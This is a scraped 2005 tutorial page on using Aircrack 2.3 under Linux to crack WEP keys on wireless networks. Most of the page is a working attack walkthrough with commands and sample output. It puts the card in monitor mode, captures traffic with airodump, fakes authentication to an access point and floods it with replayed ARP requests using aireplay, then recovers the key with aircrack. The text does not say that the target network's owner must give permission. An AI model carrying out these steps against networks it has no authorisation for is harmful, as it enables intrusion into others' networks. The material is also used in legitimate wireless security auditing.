• Embed Doc
  • Copy Link
  • Readcast
  • Collections
  • 3
    CommentGo Back
 
Aircrack 2.3 (WEP, WPA-PSK Creck)
Aircrack 2.3 (WEP, WPA-PSK Creck) 
11/Nov/2005 tested on SuSE 9.3Aircrack is a set of tools for auditing wireless networks:
q
 
airodump: 802.11 packet capture program
q
 
aireplay: 802.11 packet injection program
q
 
aircrack: static WEP and WPA-PSK key cracker
q
 
airdecap: decrypts WEP/WPA capture files
Installation
1. Download Aircrack fromhttp://100h.org/wlan/aircrack/  2. Read the documentation (README.html) and follow. It has the most comprehensive explanation.3. I have a CISCO Aironet 350 and PrismGT card (Corega WLCB-54GT) and both work fine. Aironet 350 works for11b network but aireplay is not supported. PrismGT card works for 11b/g network and both airodump and aireplayworks. For PrismGT card, I needed to compile the driver. But it was not so difficult as expected. I just follow theexplanation in the document.
WEP Attack
How to capture (airodump) (WEP)
1. For this example, a PrismGT card is used. It is recognized as eth0. But other card may be ath0 or something else.2. Change to monitor mode
# airmon.shusage: /usr/local/bin/airmon.sh [channel]Interface Chipset Drivereth0 PrismGT prism54# airmon.sh start eth0usage: /usr/local/bin/airmon.sh [channel]Interface Chipset Drivereth0 PrismGT prism54
(monitor mode enabled)
3. Search WLANs. 0 to hop between channels.
# airodump eth0 out 0BSSID PWR Beacons # Data CH MB ENC ESSID00:0D:0B:98:96:7F 48 2 0 11 54 WEP? 4B18E8C83ABD00:A0:B0:40:5C:84 87 13 16 1 54 WEP HOGE
http://www.grape-info.com/doc/linux/config/aircrack-2.3.html (1 of 8)3/30/2006 2:36:14 PM
 
Aircrack 2.3 (WEP, WPA-PSK Creck)
BSSID STATION PWR Packets ESSID00:A0:B0:40:5C:84 00:04:23:52:80:41 86 4 HOGE
4. Press Ctl+c. Next we will capture only channel 1 (ESSID HOGE), and specify 1 to only cature unique WEP IVs. Itsaves space.
# airodump eth0 out 1 1BSSID PWR Beacons # Data CH MB ENC ESSID 
00:A0:B0:40:5C:84
87 36 48 1 54 WEP HOGEBSSID STATION PWR Packets ESSID00:A0:B0:40:5C:84
00:04:23:52:80:41
87 38 HOGE
Fake authentication (aireplay) (WEP)
1. We will use airoeplay to inject packets, so we can capture packets easily. Open another console. Copy BSSID andpaste as,
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 eth012:14:06 Sending Authentication Request12:14:06 Authentication successful12:14:06 Sending Association Request12:14:07
 Association successful :-)
If it cannot associate, use station's MAC,
# aireplay -1 0 -e HOGE -a 00:A0:B0:40:5C:84 -h
00:04:23:52:80:41
eth0
Some access points require to reassociate every 20 seconds, otherwise the fake client is considered disconnected. Inthis case, setup the periodic re-association delay:
# aireplay -1
20
-e HOGE -a 00:A0:B0:40:5C:84 -h 00:04:23:52:80:41 eth0
2. Once associated, send packets as following. If you are not associated, you see no send packet.
# aireplay -3 -b 00:A0:B0:40:5C:84 -h 0:1:2:3:4:5 -x 600 eth0Saving APR requests in replay_arp-1112-031550.capYou must also start airodump to capture replies.Read 39123 packets (got 1024 APR requests), sent
24543
packets...
3. If it stoped sending, you need to associate again. Consider setup of the periodic re-association delay. I used crontab tore-associate again and again.
How to crack (aircrack) (WEP)
1. Open a new console, and type following command. Aircrack can read the updated file automatically so you can run
http://www.grape-info.com/doc/linux/config/aircrack-2.3.html (2 of 8)3/30/2006 2:36:14 PM
 
Aircrack 2.3 (WEP, WPA-PSK Creck)
airodump and aircrack at the same time.
# aircrack -x -0 out.ivs
 2. For 104bit WEP needs about one million IVs. You may need one day or more time to capture the packets. However if you use aireplay and inject, you need only few hours.3. This is the result. It needed only a quarter a million.4. Aircrack can also run on Windows but aireplay is not supported though.
http://www.grape-info.com/doc/linux/config/aircrack-2.3.html (3 of 8)3/30/2006 2:36:14 PM
of 00

Leave a Comment

You must be to leave a comment.
Submit
Characters: ...
Isaac Jootar

Hacking is bad, help me God.

reply03 / 01 / 2011
You must be to leave a comment.
Submit
Characters: ...